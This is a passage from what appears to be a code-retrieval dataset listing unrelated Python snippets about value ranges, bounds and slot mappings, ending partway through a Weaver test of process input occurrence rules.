intent=\"inform\")],\n \"frosting\": [self.from_entity(\n entity=\"frosting\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"lawyer\": [self.from_entity(\n entity=\"lawyer\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"kitty_corner\": [self.from_entity(\n entity=\"kitty_corner\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"firefly\": [self.from_entity(\n entity=\"firefly\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"verge\": [self.from_entity(\n entity=\"verge\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"brew_thru\": [self.from_entity(\n entity=\"brew_thru\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")],\n \"water_fountain\": [self.from_entity(\n entity=\"water_fountain\", \n intent=\"inform\"),\n self.from_text(\n intent=\"inform\")]\n }", "def test_get_range(self):\n pass", "def scan_range(self, obj):\n detect_minmax = []\n for item in self._category:\n cat = item.replace(' ', '')\n has_minmax = False\n for k, v in obj.items():\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(v.items())[-1]\n while not isinstance(in_v, str):\n has_minmax = has_minmax or isinstance(v.get(cat), dict)\n in_k, in_v = list(in_v.items())[-1]\n \n if has_minmax:\n detect_minmax.append('Min ' + item)\n detect_minmax.append('Max ' + item)\n else:\n detect_minmax.append(item)\n \n self._category_aux = detect_minmax\n for c in self._category_aux:\n self._data[c] = []", "def get_allowed_ranges(csvfile):\n from csv import DictReader\n ranges = {}\n with open(csvfile, 'r') as infile:\n # Remove spaces from field headers\n firstline = infile.readline()\n headers = [k.strip() for k in firstline.split(',')]\n if not len(headers) == 11:\n headers = [k.strip() for k in firstline.split(' ')]\n opfield = 'CSVv2;OperatingPoint'\n if not opfield in headers: opfield = 'cMVAv2;OperatingPoint'\n if not opfield in headers: opfield = 'CSV;OperatingPoint'\n\n reader = DictReader(infile, fieldnames=headers)\n for row in reader:\n key = (int(row[opfield].strip()),\n row['measurementType'].strip(),\n row['sysType'].strip(),\n int(row['jetFlavor'].strip()))\n ranges.setdefault(key, {})\n for var in ['eta', 'pt', 'discr']:\n mini = float(row['%sMin'%var].strip())\n maxi = float(row['%sMax'%var].strip())\n ranges[key]['%sMin'%var] = min(ranges[key].setdefault('%sMin'%var, mini), mini)\n ranges[key]['%sMax'%var] = max(ranges[key].setdefault('%sMax'%var, maxi), maxi)\n return ranges", "def area(minRA, maxRA, minDec, maxDec):\n\n return dict(zip(['minRA', 'maxRA', 'minDec', 'maxDec'], [minRA, maxRA, minDec, maxDec]))", "def _get_range(self):\n return tuple((0, m, 1) for m in self.level_shapes[0])", "def summarize_ranges(self, ranges):\n if len(ranges) == 0: return []\n min_ = 'min'\n max_ = 'max'\n for r in ranges:\n if r[0][0] == \"min\":\n r[0][0] = min_\n else:\n min_ = r[0][0]\n if r[-1][1] == \"max\":\n r[-1][1] = max_\n else:\n max_ = r[-1][1]\n return ranges[-1]", "def get_gnid_range_map(node_tids):\n ntypes_gid_range = {}\n offset = 0\n for k, v in node_tids.items():\n ntypes_gid_range[k] = [offset + int(v[0][0]), offset + int(v[-1][1])]\n offset += int(v[-1][1])\n\n return ntypes_gid_range", "def merge_ranges():", "def generate_var_ranges(self):\n\n var_ranges = {}\n for var in self.variables:\n min_to_max = list(range(int(var['min']), int(var['max']) + 1))\n if (var['zero_ok'] == False and 0 in min_to_max):\n min_to_max.remove(0)\n\n var_ranges[var['variable']] = min_to_max\n\n return var_ranges", "def create_dict(list, old_min, old_max, new_min, new_max):\n d = {}\n for row in list:\n tds = row.find_all(\"td\")\n letter = tds[0].string\n freq = tds[1].string[:-1]\n freq = float(freq.replace(',', '.'))\n d[letter] = map_to_range(freq, old_min, old_max, new_min, new_max)\n\n return d", "def get_idranges(names, counts, num_chunks=None):\n gnid_start = 0\n gnid_end = gnid_start\n tid_dict = {}\n gid_dict = {}\n\n for idx, typename in enumerate(names):\n gnid_end += counts[typename]\n tid_dict[typename] = [[0, counts[typename]]]\n gid_dict[typename] = np.array([gnid_start, gnid_end]).reshape([1, 2])\n gnid_start = gnid_end\n\n return tid_dict, gid_dict", "def get_ranges(self, tchain, kw):\n (lo, hi) = (\"min\", \"max\")\n ran = None\n for t in tchain:\n rstmt = t.search_one(kw)\n if rstmt is None: continue\n ran = [ i.split(\"..\") for i in rstmt.arg.split(\"|\") ]\n if ran[0][0] != 'min': lo = ran[0][0]\n if ran[-1][-1] != 'max': hi = ran[-1][-1]\n if ran is None: return None\n if len(ran) == 1:\n return [(lo, hi)]\n else:\n return [(lo, ran[0][-1])] + ran[1:-1] + [(ran[-1][0], hi)]", "def _example_parser(range_val: int) -> Dict[str, tf.Tensor]:\n image = tf.random.stateless_categorical(\n tf.math.log([[0.5, 0.5]]), np.prod(self._image_shape),\n [self._split_seed[split], self._split_seed[split] + range_val],\n dtype=tf.int32)\n image = tf.reshape(tf.cast(image, tf.float32), self._image_shape)\n image = 2.0 * (image - 0.5)\n label = tf.zeros([], tf.int32)\n return {\"features\": image, \"labels\": label}", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangeArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def get_range(self):\n # CEBHACKALERT: was written assuming it would only operate on\n # Parameterized instances. Think this is an sf.net bug/feature\n # request. Temporary fix: don't use obj.name if unavailable.\n try:\n d=dict([(obj.name,obj) for obj in self.objects])\n except AttributeError:\n d=dict([(obj,obj) for obj in self.objects])\n return d", "def findRanges(data_grouped):\n ranges = []\n for i in data_grouped.columns:\n theRange = (data_grouped[i].min(), data_grouped[i].max())\n ranges.append(theRange)\n return ranges", "def value_ranges(self, attributes):\n ranges = []\n for attribute in attributes:\n if not attribute.is_continuous():\n raise inv.InvalidDataError('Cannot discretise non continuous attribute ' + attribute.name)\n values = self.values_grouped_by_attribute(attributes)\n for value in values: #each entry in values is the range of values for a particular attribute\n value.sort()\n ranges.append(r.Range(value[0], value[-1], True))\n return ranges", "def base_mappings():\n return {\n 'from_1': {\n 'to_1': {\n 'mol_1': ({}, {}, []),\n 'mol_2': ({}, {}, []),\n },\n },\n }", "def _example_parser(range_val: int) -> Dict[str, tf.Tensor]:\n image = tf.random.stateless_normal(\n self._image_shape,\n [self._split_seed[split], self._split_seed[split] + range_val],\n dtype=tf.float32)\n image_min = tf.reduce_min(image)\n image_max = tf.reduce_max(image)\n # Normalize the values of the image to be in [-1, 1].\n image = 2.0 * (image - image_min) / (image_max - image_min) - 1.0\n label = tf.zeros([], tf.int32)\n return {\"features\": image, \"labels\": label}", "def range_8(configuration):\n range_dict_all = {\n # updated aLIGO design sensitivity range from 197.5 to 181.5 Mpc on 9 Apr 2018 to reflect T1800044-v4\n \"HL\" : {'H1' : 181.5, 'L1' : 181.5},\n \"HLV\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"HLVK\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0},\n \"HLVKI\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, 'K1' : 160.0, 'I1' : 181.5},\n \"GW170817\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26, 'V1': 58/2.26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"GW170817_without_Virgo\" : {'H1': 107/2.26 *1.26 , 'L1': 218/2.26},\n \"GW170814\" : {'H1': 53, 'L1': 98, 'V1': 26}, # 1.26 is the improvement factor for H1's range due to data processing.\n \"design\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3 },\n \"early\" : {'H1' : 60., 'L1': 60.},\n \"half_ligo\" : {'H1' : 99, 'L1' : 99, 'V1': 128.3 },\n \"half_virgo\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 64 },\n \"nosrm\" : {'H1' : 159, 'L1' : 159, 'V1': 109 },\n \"india\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 },\n \"kagra\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0},\n \"bala\" : {'H1' : 181.5, 'H2' : 181.5, 'L1' : 181.5, 'V1': 128.3, \\\n \"I1\" : 181.5 , \"K1\" : 160.0},\n \"sa\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"sa2\" : {'H1' : 181.5, 'L1' : 181.5, 'V1': 128.3, \"I1\" : 181.5 , \\\n \"K1\" : 160.0, \"S1\":181.5},\n \"steve\" : {'H1' : 160.0, 'L1' : 160.0, 'V1': 160.0, \"I1\" : 160.0 },\n \"s6vsr2\" : {'H1' : 20., 'L1' : 20., 'V1': 8. }\n }\n return(range_dict_all[configuration])", "def get_bounds():\n return [0.00], [1.00]", "def planets_in_range(self):\n\n query_string = \"SELECT * from planets_in_range;\"\n\n # Perform query\n self.conn_cur.execute(query_string)\n results = self.conn_cur.fetchall()\n\n # Build dictionary\n ranges = {}\n for row in results:\n ranges[row[0]] = row[1]\n\n return ranges", "def getAFeRange(brand):\n return afe_range[brand]", "def get_range(self) -> tuple[int, int]:\n return self.range_from, self.range_to", "def init_range_variables(self):\n self.range_start_vars_array = []\n self.range_end_vars_array = []\n\n for idx in range(len(self._pk_for_filter)):\n self.range_start_vars_array.append(\"@range_start_{}\".format(idx))\n self.range_end_vars_array.append(\"@range_end_{}\".format(idx))\n self.range_start_vars = \",\".join(self.range_start_vars_array)\n self.range_end_vars = \",\".join(self.range_end_vars_array)", "def ranges(self):\n return self._ranges", "def range_table(self):\n range_table_base = []\n if self.block_mask != None:\n range_table_length = len(self.block_mask)\n else:\n range_table_length = self.block_num\n\n for i in range(range_table_length):\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.filter_num))\n range_table_base.append(len(self.k_size))\n range_table_base.append(len(self.pool_type))\n\n return range_table_base", "def getMassRange(brand):\n return mass_range[brand]", "def input_definition(self):\n return {\n 'incline1': [-MAX_ANGLE, MAX_ANGLE],\n 'incline2': [-MAX_ANGLE, MAX_ANGLE],\n 'incline3': [-MAX_ANGLE, MAX_ANGLE],\n 'incline4': [-MAX_ANGLE, MAX_ANGLE],\n 'incline5': [-MAX_ANGLE, MAX_ANGLE]\n }", "def getAgeRange(brand):\n from numpy import arange, append\n \n # search dictionary for tuple containing age limits (min, max, delta)\n #age_limits = age_range[brand]\n \n # hard code age range properties (temporary)\n if brand in ['Lyon', 'Lyon10', 'Lyon19']:\n ages = 10.0**arange(6.0, 10.1, 0.1)\n elif brand in ['DMESTAR', 'DSEP14', 'DSEP08', 'DSEP']:\n ages = arange(1.0e6, 20.0e6, 1.0e5) \n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Pisa']:\n ages = arange(1.0e6, 20.0e6, 1.0e6)\n ages = append(ages, arange(2.0e7, 1.001e8, 5.0e6))\n elif brand in ['Yale', 'Yale13', 'BAton']:\n ages = arange(1.0e6, 2.0e7, 2.0e5)\n ages = append(ages, arange(2.0e7, 1.0e8, 5.0e6))\n else:\n ages = 0.0\n \n return ages", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['IDRangePatchArgs']]]]:\n return pulumi.get(self, \"ranges\")", "def dict_time(self, workspace_unique_id=None, subset_unique_id=None, request=None):\n workspace_object = self._get_workspace_object(unique_id=workspace_unique_id) \n subset_object = workspace_object.get_subset_object(subset_unique_id) \n if not subset_object:\n self._logger.warning('Could not find subset object {}. Subset is probably not loaded.'.format(subset_unique_id))\n return {}\n\n data_filter_object = subset_object.get_data_filter_object('step_1')\n if request:\n data_filter_object.set_filter(filter_type='include_list', \n filter_name='MYEAR', \n data=request['year_range'])\n# data_filter_object.set_filter(filter_type='include_list', \n# filter_name='MONTH', \n# data=request['month_list'])\n \n else:\n year_list = sorted(map(int, data_filter_object.get_include_list_filter('MYEAR')))\n# month_list = sorted(map(int, data_filter_object.get_include_list_filter('MONTH')))\n \n return {\"year_range\": [year_list[0], year_list[-1]]}#, \"month_list\": month_list}", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n return {\n \"payment_amount\": [\n self.from_entity(entity=\"payment_amount\"),\n self.from_entity(entity=\"amount-of-money\"),\n self.from_entity(entity=\"number\"),\n ],\n \"confirm\": [\n self.from_intent(value=True, intent=\"affirm\"),\n self.from_intent(value=False, intent=\"deny\"),\n ],\n }", "def get_valid_values_map(self, condition=True):\n tpninfos = self.locate.get_all_tpninfos(self.instrument, self.filekind, \"ld_tpn\")\n required_keys = self.get_required_parkeys()\n valid_values = {}\n for info in tpninfos:\n if info.is_complex_constraint:\n continue\n if info.name in required_keys:\n values = info.values\n if len(values) == 1 and \":\" in values[0]:\n limits = values[0].split(\":\")\n try:\n limits = [int(float(x)) for x in limits]\n except Exception:\n pass\n # sys.exc_clear()\n else:\n values = list(range(limits[0], limits[1]+1))\n if condition:\n values = tuple([utils.condition_value(val) for val in values])\n valid_values[info.name] = values\n return valid_values", "def get_recordrange(self):\r\n if self.version >= 10.1:\r\n querystr = \"\"\"?where=&outFields=*&returnGeometry=false&returnIdsOnly=false&returnCountOnly=false&orderByFields=&groupByFieldsForStatistics=&outStatistics=[{%0D%0A++++\"statisticType\"%3A+\"count\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidcount\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"min\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmin\"%0D%0A++}%2C{%0D%0A++++\"statisticType\"%3A+\"max\"%2C%0D%0A++++\"onStatisticField\"%3A+\"objectid\"%2C+++++\"outStatisticFieldName\"%3A+\"oidmax\"%0D%0A++}]&returnZ=false&returnM=false&returnDistinctValues=false&f=pjson\"\"\"\r\n req = requests.get(self.endpointurl + querystr)\r\n self.recordinfo = req.json()[\"features\"][0][\"attributes\"]\r\n\r\n elif self.version < 10.1:\r\n querystr = \"\"\"?text=&geometry=&geometryType=esriGeometryPoint&inSR=&spatialRel=esriSpatialRelIntersects&relationParam=&objectIds=&where=objectid+>+-1&time=&returnCountOnly=true&returnIdsOnly=false&returnGeometry=false&maxAllowableOffset=&outSR=&outFields=&f=pjson\"\"\"\r\n req = requests.get(self.endpontquerystr + qs)\r\n self.recordinfo = {\"oidmin\": 0, \"oidmax\": req.json()[\"count\"]}\r\n\r\n [\r\n self.iterlist.append([x, x + 999])\r\n for x in range(\r\n self.recordinfo[\"oidmin\"]\r\n if self.recordinfo[\"oidmin\"] != self.recordinfo[\"oidmax\"]\r\n else 1 - self.recordinfo[\"oidmin\"],\r\n self.recordinfo[\"oidmax\"],\r\n 1000,\r\n )\r\n ]", "def get_price_range_map(data_map):\n res_map = defaultdict(lambda: deepcopy(static_constants.UNIT_PRICE_DEFAULT))\n for key, list_of_price in data_map.items():\n list_of_price.sort()\n lower_price = np.percentile(list_of_price, 40)\n higher_price = np.percentile(list_of_price, 70)\n median_price = np.percentile(list_of_price, 50)\n res_map[key] = {'lower_price': lower_price, 'median_price': median_price, 'higher_price': higher_price}\n return res_map", "def cal(num1, num2, range):\r\n setup(range)\r\n return Andcollections(num1, num2)", "def process_primary_inputs(dict_):\n try:\n dict_[\"ESTIMATION\"][\"bins\"]\n except KeyError:\n bins = 25\n else:\n bins = dict_[\"ESTIMATION\"][\"bins\"]\n\n try:\n dict_[\"ESTIMATION\"][\"logit\"]\n except KeyError:\n logit = True\n else:\n logit = dict_[\"ESTIMATION\"][\"logit\"]\n\n try:\n dict_[\"ESTIMATION\"][\"bandwidth\"]\n except KeyError:\n bandwidth = 0.32\n else:\n bandwidth = dict_[\"ESTIMATION\"][\"bandwidth\"]\n\n try:\n dict_[\"ESTIMATION\"][\"gridsize\"]\n except KeyError:\n gridsize = 500\n else:\n gridsize = dict_[\"ESTIMATION\"][\"gridsize\"]\n\n try:\n dict_[\"ESTIMATION\"][\"ps_range\"]\n except KeyError:\n prop_score_range = [0.005, 0.995]\n else:\n prop_score_range = dict_[\"ESTIMATION\"][\"ps_range\"]\n\n start_grid = prop_score_range[0]\n endgrid = prop_score_range[1]\n\n return bins, logit, bandwidth, gridsize, start_grid, endgrid", "def m_to_range(self, data):\n return (data - self._min_range_m) / self._total_range", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"fecha_hora\": [\n self.from_entity(entity=\"time\"),\n\n ]\n }", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n # type: () -> Dict[Text: Union[Dict, List[Dict]]]\n return {\n \"fecha_hora\": [\n self.from_entity(entity=\"time\"),\n\n ]\n }", "def get_input_voltage_ranges(self):\r\n bufsize = 32\r\n range_list_type = cfloat64 * bufsize\r\n range_list = range_list_type()\r\n NIDAQ_dll.DAQmxGetDevAIVoltageRngs(self.dev_id.encode('ascii'),\r\n ctypes.byref(range_list), uInt32(bufsize))\r\n range_list = list(range_list)\r\n range_values_n = range_list.index(0.0)\r\n range_n = range_values_n / 2\r\n return_list = []\r\n for idx in range(range_n):\r\n return_list.append([range_list[2*idx],\r\n range_list[(2*idx)+1]]) \r\n return return_list", "def emb(self, entity):\n fv = []\n # fv.append(self.sum_pw(entity))\n fv.append(self.avg_pw(entity))\n fv.append(self.min_pw(entity))\n fv.append(self.max_pw(entity))\n fv.append(self.my_pw(entity))\n fv.append(self.min_e_score(entity))\n fv.append(self.max_e_score(entity))\n fv.append(self.avg_e_score(entity))\n # fv.append(self.new_edges(entity)) # only comes into play for regress.\n return fv", "def possible_vals(pp):\n\n if pp[\"type\"] == \"w\":\n vals = [0, pp[\"pmax\"]]\n\n elif pp[\"type\"] == \"windturbine\":\n vals = [0, pp[\"pmin\"]]\n for i in range(pp[\"pmin\"], pp[\"pmax\"] - pp[\"pmin\"] + 1):\n vals.append(pp[\"pmin\"] + i)\n\n else: # Turbojet\n vals = [0]\n for i in range(pp[\"pmin\"], pp[\"pmax\"] - pp[\"pmin\"]):\n vals.append(pp[\"pmin\"] + i)\n return vals", "def get_dict_from_range(self, start=None, end=None):\n df = self.from_range(self.data, self.factor, start, end, self.lowpass)\n new_source_data = df.to_dict(orient=\"list\")\n new_source_data[\"index\"] = df.index\n for k in list(new_source_data):\n if isinstance(k, tuple):\n new_source_data[\"_\".join(k)] = new_source_data.pop(k)\n\n return new_source_data", "def new_ranges(rs):\n return tuple(chain(*[new_range(r) for r in rs]))", "def parse_ranges(ranges, expand=True):\n pairs = ranges.split(' ')\n content = {}\n for key, value in [pair.split('=') for pair in pairs if '=' in pair]:\n content[key] = parse_range_once(value, expand)\n return content", "def range_temp(start,end):\n year, month, date = map(int, start.split('-'))\n date_start = dt.date(year,month,day)\n year2, month2, date2 = map(int, end.split('-'))\n date_end = dt.date(year2,month2,day2)\n # Query for tobs for definied date range\n results = session.query(func.min(Measurement.tobs),func.max(Measurement.tobs).\\\n func.avg(Measurement.tobs)).filter(Measurement.date >= date_start).filter(Measurement.date <= date_end).all()\n data = list(np.ravel(results))\n return jsonify(data)", "def range_to_m(self, data):\n return data * self._total_range + self._min_range_m", "def parse_range(option):\n return {\"range\": timedelta(days=option)}", "def range_parameter_to_dict(parameter: RangeParameter) -> Dict[str, Any]:\n return {\n \"__type\": parameter.__class__.__name__,\n \"name\": parameter.name,\n \"parameter_type\": parameter.parameter_type,\n \"lower\": parameter.lower,\n \"upper\": parameter.upper,\n \"log_scale\": parameter.log_scale,\n \"logit_scale\": parameter.logit_scale,\n \"digits\": parameter.digits,\n \"is_fidelity\": parameter.is_fidelity,\n \"target_value\": parameter.target_value,\n }", "def _autobounds(self):\n bounds = {}\n\n def check(prop, compare, extreme, val):\n opp = min if compare is max else max\n bounds.setdefault(prop, val)\n bounds[prop] = opp(compare(bounds[prop], val), extreme)\n\n def bound_check(lat_lon):\n lat, lon = lat_lon\n check('max_lat', max, 90, lat)\n check('min_lat', min, -90, lat)\n check('max_lon', max, 180, lon)\n check('min_lon', min, -180, lon)\n\n lat_lons = [lat_lon for feature in self._features.values() for\n lat_lon in feature.lat_lons]\n if not lat_lons:\n lat_lons.append(self._default_lat_lon)\n for lat_lon in lat_lons:\n bound_check(lat_lon)\n\n return bounds", "def startEnd(start, end):\n # * Return a JSON list of the minimum temperature, the average temperature, and the max temperature for a given start or start-end range.\n # * When given the start and the end date, calculate the `TMIN`, `TAVG`, and `TMAX` for dates between the start and end date inclusive.\n session = Session(engine)\n results = session.query(func.min(Measurement.tobs), func.avg(Measurement.tobs), func.max(Measurement.tobs)).filter(Measurement.date>=start, Measurement.date<=end).all()\n session.close()\n s_e_descriptors = list(np.ravel(results))\n \n return jsonify(s_e_descriptors)", "def calculate_ranges(period, availability, service_recipe, resources):\n\n ranges = []\n\n period_start_dt, period_end_dt = period\n\n delta_duration = get_service_duration(service_recipe)\n delta_step = get_service_step(service_recipe)\n\n loop_dt_range = by_timedelta_range((timedelta(0), delta_duration),\n period_start_dt)\n\n while contains(period, loop_dt_range):\n\n if not is_datetime_range_available(loop_dt_range, availability):\n near_working_dt_range = nearest_working_datetime_range(\n loop_dt_range, availability)\n\n if near_working_dt_range is not None:\n loop_dt_range = by_timedelta_range(\n (timedelta(0), delta_duration), near_working_dt_range[0])\n else:\n loop_dt_range = by_timedelta_range(\n (timedelta(0), delta_duration),\n start_of_tomorrow(loop_dt_range[0]))\n\n continue\n\n resource_occupations = get_resource_occupations_in_dt_range(\n loop_dt_range, service_recipe, resources)\n if resource_occupations:\n ranges.append((loop_dt_range, resource_occupations))\n\n # like i++ but more cool\n loop_dt_range = by_timedelta_range(\n (delta_step, delta_step + delta_duration), loop_dt_range[0])\n\n return ranges", "def attributes(self):\n attrs_ = super(NumericAttributeSchema, self).attributes()\n attrs_.append(\"range\")\n return attrs_", "def byrange(self, start, stop):\n\t\treturn ElementsByRange(self.AEM_want, self, (start, stop))", "def slot_mappings(self) -> Dict[Text, Union[Dict, List[Dict]]]:\n\n # return { \"faq_choice\": self.from_entity(\"faq_choice\"),\"faq_question\": self.from_entity(\"faq_question\"), \"faq_text\": [self.from_text()]}\n\n return {\"faq_choice\": [self.from_entity(\"faq_choice\"), self.from_text()], \"faq_text\": [self.from_text(), self.from_entity(entity=\"navigation\")]}", "def test_resolution_io_min_max_occurs(self):\n cwl = {\n \"cwlVersion\": \"v1.0\",\n \"class\": \"CommandLineTool\",\n \"inputs\": [\n # although types are parsed in multiple ways to compare default/null/array/minOccurs/maxOccurs\n # values, the original definitions here are preserved when there are no complementary WPS details\n {\"id\": \"required_literal\", \"type\": \"string\"},\n {\"id\": \"required_literal_default\", \"type\": \"string\", \"default\": \"test\"},\n {\"id\": \"optional_literal_shortcut\", \"type\": \"string?\"},\n {\"id\": \"optional_literal_explicit\", \"type\": [\"null\", \"string\"]},\n {\"id\": \"required_array_shortcut\", \"type\": \"string[]\"},\n {\"id\": \"required_array_explicit\", \"type\": {\"type\": \"array\", \"items\": \"string\"}},\n {\"id\": \"optional_array_shortcut\", \"type\": \"string[]?\"},\n {\"id\": \"optional_array_explicit\", \"type\": [\"null\", {\"type\": \"array\", \"items\": \"string\"}]},\n # types with complementary WPS details might change slightly depending on combinations encountered\n {\"id\": \"required_literal_min_fixed_by_wps\", \"type\": \"string?\"}, # string? => string (min=1)\n {\"id\": \"optional_literal_min_fixed_by_wps\", \"type\": \"string\"}, # string => string? (min=0)\n {\"id\": \"required_array_min_fixed_by_wps\", \"type\": \"string\"}, # string => string[] (min>1)\n {\"id\": \"required_array_min_optional_fixed_by_wps\", \"type\": \"string?\"}, # string? => string[] (min>1)\n {\"id\": \"required_array_max_fixed_by_wps\", \"type\": \"string\"}, # string => string[] (max>1)\n {\"id\": \"optional_array_max_fixed_by_wps\", \"type\": \"string?\"}, # string? => string[]? (max>1)\n {\"id\": \"optional_array_min_max_fixed_by_wps\", \"type\": \"string\"}, # string => string[]? (0..>1)\n ],\n \"outputs\": {\n \"values\": {\"type\": \"float\"}\n }\n }\n body = {\n \"processDescription\": {\n \"process\": {\n \"id\": self._testMethodName,\n \"title\": \"some title\",\n \"abstract\": \"this is a test\",\n \"inputs\": [\n {\"id\": \"required_literal_min_fixed_by_wps\", \"minOccurs\": \"1\"},\n {\"id\": \"optional_literal_min_fixed_by_wps\", \"minOccurs\": \"0\"},\n {\"id\": \"required_array_min_fixed_by_wps\", \"minOccurs\": \"2\"},\n {\"id\": \"required_array_min_optional_fixed_by_wps\", \"minOccurs\": \"2\"},\n {\"id\": \"required_array_max_fixed_by_wps\", \"maxOccurs\": \"10\"},\n {\"id\": \"optional_array_max_fixed_by_wps\", \"minOccurs\": \"0\", \"maxOccurs\": \"10\"},\n {\"id\": \"optional_array_min_max_fixed_by_wps\", \"minOccurs\": \"0\", \"maxOccurs\": \"10\"},\n ]\n }\n },\n \"deploymentProfileName\": \"http://www.opengis.net/profiles/eoc/wpsApplication\",\n \"executionUnit\": [{\"unit\": cwl}],\n }\n desc, pkg = self.deploy_process(body, describe_schema=\"OLD\")\n proc = desc[\"process\"]\n\n assert proc[\"inputs\"][0][\"id\"] == \"required_literal\"\n assert proc[\"inputs\"][0][\"minOccurs\"] == 1\n assert proc[\"inputs\"][0][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][1][\"id\"] == \"required_literal_default\"\n assert proc[\"inputs\"][1][\"minOccurs\"] == 0\n assert proc[\"inputs\"][1][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][2][\"id\"] == \"optional_literal_shortcut\"\n assert proc[\"inputs\"][2][\"minOccurs\"] == 0\n assert proc[\"inputs\"][2][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][3][\"id\"] == \"optional_literal_explicit\"\n assert proc[\"inputs\"][3][\"minOccurs\"] == 0\n assert proc[\"inputs\"][3][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][4][\"id\"] == \"required_array_shortcut\"\n assert proc[\"inputs\"][4][\"minOccurs\"] == 1\n assert proc[\"inputs\"][4][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][5][\"id\"] == \"required_array_explicit\"\n assert proc[\"inputs\"][5][\"minOccurs\"] == 1\n assert proc[\"inputs\"][5][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][6][\"id\"] == \"optional_array_shortcut\"\n assert proc[\"inputs\"][6][\"minOccurs\"] == 0\n assert proc[\"inputs\"][6][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][7][\"id\"] == \"optional_array_explicit\"\n assert proc[\"inputs\"][7][\"minOccurs\"] == 0\n assert proc[\"inputs\"][7][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][8][\"id\"] == \"required_literal_min_fixed_by_wps\"\n assert proc[\"inputs\"][8][\"minOccurs\"] == 1\n assert proc[\"inputs\"][8][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][9][\"id\"] == \"optional_literal_min_fixed_by_wps\"\n assert proc[\"inputs\"][9][\"minOccurs\"] == 0\n assert proc[\"inputs\"][9][\"maxOccurs\"] == 1\n assert proc[\"inputs\"][10][\"id\"] == \"required_array_min_fixed_by_wps\"\n # FIXME: https://github.com/crim-ca/weaver/issues/50\n # `maxOccurs=1` not updated to `maxOccurs=\"unbounded\"` as it is evaluated as a single value,\n # but it should be considered an array since `minOccurs>1`\n # (see: https://github.com/crim-ca/weaver/issues/17)\n assert proc[\"inputs\"][10][\"minOccurs\"] == 2\n # assert proc[\"inputs\"][10][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][11][\"id\"] == \"required_array_min_optional_fixed_by_wps\"\n assert proc[\"inputs\"][11][\"minOccurs\"] == 2\n # assert proc[\"inputs\"][11][\"maxOccurs\"] == \"unbounded\"\n assert proc[\"inputs\"][12][\"id\"] == \"required_array_max_fixed_by_wps\"\n assert proc[\"inputs\"][12][\"minOccurs\"] == 1\n assert proc[\"inputs\"][12][\"maxOccurs\"] == 10\n assert proc[\"inputs\"][13][\"id\"] == \"optional_array_max_fixed_by_wps\"\n assert proc[\"inputs\"][13][\"minOccurs\"] == 0\n assert proc[\"inputs\"][13][\"maxOccurs\"] == 10\n\n assert pkg[\"inputs\"][0][\"id\"] == \"required_literal\"\n assert pkg[\"inputs\"][0][\"type\"] == \"string\"\n assert pkg[\"inputs\"][1][\"id\"] == \"required_literal_default\"\n assert pkg[\"inputs\"][1][\"type\"] == \"string\"\n assert pkg[\"inputs\"][1][\"default\"] == \"test\"\n assert pkg[\"inputs\"][2][\"id\"] == \"optional_literal_shortcut\"\n 